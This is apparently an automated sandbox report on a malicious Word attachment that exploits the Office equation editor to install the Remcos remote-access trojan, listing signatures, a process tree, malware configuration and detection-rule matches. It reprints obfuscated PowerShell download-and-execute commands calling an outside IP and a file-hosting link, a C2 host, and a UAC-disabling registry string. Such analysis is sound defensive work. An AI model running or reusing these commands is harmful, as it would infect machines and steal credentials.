Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO NAHK22012FA00000.docx.doc

Overview

General Information

Sample name:PO NAHK22012FA00000.docx.doc
Analysis ID:1540324
MD5:a4633b398a95e20e7ec12dcaf3090e43
SHA1:06b1ecd43566ad5aaa16986c0bccaf5c1561a31b
SHA256:e3c8080fba2dae8436582c23e49387b29f15dab713779d2d0f16a9d3ec022f3d
Tags:docdocxuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3492 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3964 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • mshta.exe (PID: 4040 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • powershell.exe (PID: 3180 cmdline: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 2052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • csc.exe (PID: 2756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline" MD5: F8F36858B9405FBE27377FD7E8FEC2F2)
            • cvtres.exe (PID: 2740 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • wscript.exe (PID: 3068 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" MD5: 979D74799EA6C8B8167869A68DF5204A)
            • powershell.exe (PID: 1980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
              • powershell.exe (PID: 2924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
                • CasPol.exe (PID: 3608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                  • CasPol.exe (PID: 3764 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                  • CasPol.exe (PID: 3880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                  • CasPol.exe (PID: 3864 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                  • CasPol.exe (PID: 3840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["servemail.exprotedsteel.pro:6498:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-N6HMP4", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "wordse"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54D5D963.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1892:$obj2: \objdata
  • 0x18ac:$obj3: \objupdate
  • 0x186d:$obj6: \objlink
C:\Users\user\AppData\Local\Temp\wordse\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x1892:$obj2: \objdata
    • 0x18ac:$obj3: \objupdate
    • 0x186d:$obj6: \objlink
    SourceRuleDescriptionAuthorStrings
    00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 20 entries
            SourceRuleDescriptionAuthorStrings
            20.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              20.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                20.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  20.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4b8:$a1: Remcos restarted by watchdog!
                  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                  20.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6657c:$str_b2: Executing file:
                  • 0x675fc:$str_b3: GetDirectListeningPort
                  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67128:$str_b7: \update.vbs
                  • 0x665a4:$str_b9: Downloaded file:
                  • 0x66590:$str_b10: Downloading file:
                  • 0x66634:$str_b12: Failed to upload file:
                  • 0x675c4:$str_b13: StartForward
                  • 0x675e4:$str_b14: StopForward
                  • 0x67080:$str_b15: fso.DeleteFile "
                  • 0x67014:$str_b16: On Error Resume Next
                  • 0x670b0:$str_b17: fso.DeleteFolder "
                  • 0x66624:$str_b18: Uploaded file:
                  • 0x665e4:$str_b19: Unable to delete:
                  • 0x67048:$str_b20: while fso.FileExists("
                  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 8 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 85.215.206.82, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3964, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3964, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wennedgreatthingswithgoodnwesforentrielifewithnew[1].hta

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDth
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3964, Protocol: tcp, SourceIp: 85.215.206.82, SourceIsIpv6: false, SourcePort: 80
